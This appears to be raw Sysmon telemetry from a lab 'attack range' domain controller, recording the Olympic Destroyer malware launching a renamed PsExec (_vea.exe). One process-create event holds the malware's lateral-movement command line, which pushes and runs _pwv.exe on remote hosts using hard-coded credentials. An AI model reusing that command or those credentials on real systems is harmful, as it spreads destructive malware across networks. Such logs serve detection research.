10:56:44.328{C8EA50B7-12EC-6216-7105-000000003802}6620C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 10341000x8000000000000000291059Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:44.297{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-12EC-6216-7205-000000003802}6692C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291058Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:44.297{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-12EC-6216-7205-000000003802}6692C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291057Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:44.281{C8EA50B7-12EC-6216-7205-000000003802}66926616C:\Windows\system32\conhost.exe{C8EA50B7-12EC-6216-7105-000000003802}6620C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291056Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:44.265{C8EA50B7-F2AA-6215-B100-000000003802}22444896C:\Windows\system32\csrss.exe{C8EA50B7-12EC-6216-7205-000000003802}6692C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000291055Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:44.265{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12EC-6216-7205-000000003802}6692C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291054Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:44.144{C8EA50B7-F2AA-6215-B100-000000003802}22443360C:\Windows\system32\csrss.exe{C8EA50B7-12EC-6216-7105-000000003802}6620C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000291053Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:44.144{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291052Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:44.144{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291051Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:44.144{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291050Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:44.144{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291049Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:44.144{C8EA50B7-12E6-6216-4B05-000000003802}67926872C:\Temp\olympic_destroyer.exe{C8EA50B7-12EC-6216-7105-000000003802}6620C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4a2f|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000291048Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:44.147{C8EA50B7-12EC-6216-7105-000000003802}6620C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\255.255.255.255 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000291047Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:44.144{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12EC-6216-7105-000000003802}6620C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 534500x8000000000000000291046Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:44.128{C8EA50B7-12EB-6216-6F05-000000003802}6160C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 10341000x8000000000000000291045Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:44.128{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12EB-6216-6F05-000000003802}6160C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291044Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:44.128{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12EB-6216-6F05-000000003802}6160C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000291043Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 10:56:44.112{C8EA50B7-12EB-6216-6F05-000000003802}6160C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 10341000x8000000000000000291042Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:44.081{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-12EC-6216-7005-000000003802}1624C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291041Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:44.081{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-12EC-6216-7005-000000003802}1624C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291040Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:44.081{C8EA50B7-12EC-6216-7005-000000003802}16246536C:\Windows\system32\conhost.exe{C8EA50B7-12EB-6216-6F05-000000003802}6160C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291039Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:44.060{C8EA50B7-F2AA-6215-B100-000000003802}22442592C:\Windows\system32\csrss.exe{C8EA50B7-12EC-6216-7005-000000003802}1624C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000291038Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:44.044{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12EC-6216-7005-000000003802}1624C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291114Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:45.965{C8EA50B7-F2AA-6215-B100-000000003802}22442592C:\Windows\system32\csrss.exe{C8EA50B7-12ED-6216-7805-000000003802}6816C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000291113Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:45.965{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12ED-6216-7805-000000003802}6816C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000291112Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:45.913{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9AE2B05FF3653AFF8FEEDF6BB6BF2AA5,SHA256=057A0AD3CD8C27E6B8391E0AE78113DB7FE9AFCCB8E1B809568D6E3BDE58A70B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000291111Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:45.898{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291110Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:45.898{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291109Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:45.898{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291108Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:45.898{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 534500x8000000000000000291107Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:45.813{C8EA50B7-12ED-6216-7505-000000003802}6740C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 10341000x8000000000000000291106Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:45.813{C8EA50B7-F2AA-6215-B100-000000003802}22444896C:\Windows\system32\csrss.exe{C8EA50B7-12ED-6216-7705-000000003802}6996C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000291105Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:45.797{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12ED-6216-7505-000000003802}6740C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291104Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:45.797{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12ED-6216-7505-000000003802}6740C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291103Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 